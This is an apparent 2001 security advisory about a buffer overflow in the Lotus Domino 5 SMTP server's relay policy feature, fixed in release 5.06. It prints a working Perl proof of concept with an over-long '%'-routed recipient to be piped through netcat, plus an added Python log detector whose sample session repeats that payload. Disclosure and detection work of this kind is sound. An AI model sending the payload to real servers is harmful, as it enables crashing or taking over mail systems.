Reported January 23, 2001, by S.A.F.E.R.

VERSIONS AFFECTED
  • Lotus Domino Notes Server 5 and 5.05

DESCRIPTION

Lotus Domino SMTP Server contains a policy feature that you can use to prevent email relaying. However, an attacker can exploit a vulnerability in this policy feature to overflow a buffer and possibly launch arbitrary commands.

DEMONSTRATION

S.A.F.E.R. supplied the following proof-of-concept code:

-- cut --

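#!/usr/bin/perl

# Over-long recipient: repeated "%A" sequences, padding, then the allowed domain
$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";

# SMTP session text written to stdout
print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n";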

-- cut --

Simply replace “allowed.domain.com” with the domain name running Lotus Notes SMTP Server, and pipe the output through netcat.
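
Added example (not part of the S.A.F.E.R. advisory): a check that a mail gateway or log review could apply to RCPT TO commands to flag recipients shaped like the one above, that is, an over-long address with repeated "%" routing. The thresholds, function names and sample session are assumptions constructed for illustration.

```python
import re

# Assumed thresholds, not taken from the advisory. RFC 5321 caps the local
# part at 64 octets and a path at 256 octets; the path is measured here
# without its angle brackets.
MAX_LOCAL_PART = 64
MAX_PATH = 256
MAX_PERCENT = 1  # more than one "%" routing hop is treated as suspicious

RCPT_RE = re.compile(r"^\s*rcpt\s+to\s*:\s*<?([^>\s]*)>?", re.IGNORECASE)


def check_rcpt(line):
    """Return the reasons a RCPT TO line looks abnormal, or [] if none."""
    m = RCPT_RE.match(line)
    if not m:
        return []  # not a RCPT TO command
    path = m.group(1)
    local, sep, _ = path.rpartition("@")
    if not sep:  # no "@": treat the whole argument as the local part
        local = path
    reasons = []
    if len(path) > MAX_PATH:
        reasons.append("path-too-long")
    if len(local) > MAX_LOCAL_PART:
        reasons.append("local-part-too-long")
    if local.count("%") > MAX_PERCENT:
        reasons.append("repeated-percent-routing")
    return reasons


def scan_session(lines):
    """Return (line_number, reasons) for every flagged RCPT TO command."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := check_rcpt(line))]


# Constructed sample session: two ordinary recipients, then one with the
# same shape as the recipient in the proof of concept.
SAMPLE_SESSION = [
    "ehlo client.example.net",
    "mail from:<alice@example.net>",
    "rcpt to:<bob@mail.example.com>",
    "rcpt to:<carol%inner.example.com@mail.example.com>",
    "rcpt to:a" + "%A" * 200 + "A" * 600 + "%mail.example.com@mail.example.com",
]

if __name__ == "__main__":
    for number, reasons in scan_session(SAMPLE_SESSION):
        print(f"line {number}: {', '.join(reasons)}")
```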

VENDOR RESPONSE

Lotus was informed of this vulnerability on November 2, 2000, and has fixed this issue in release 5.06.

CREDIT

Discovered by S.A.F.E.R.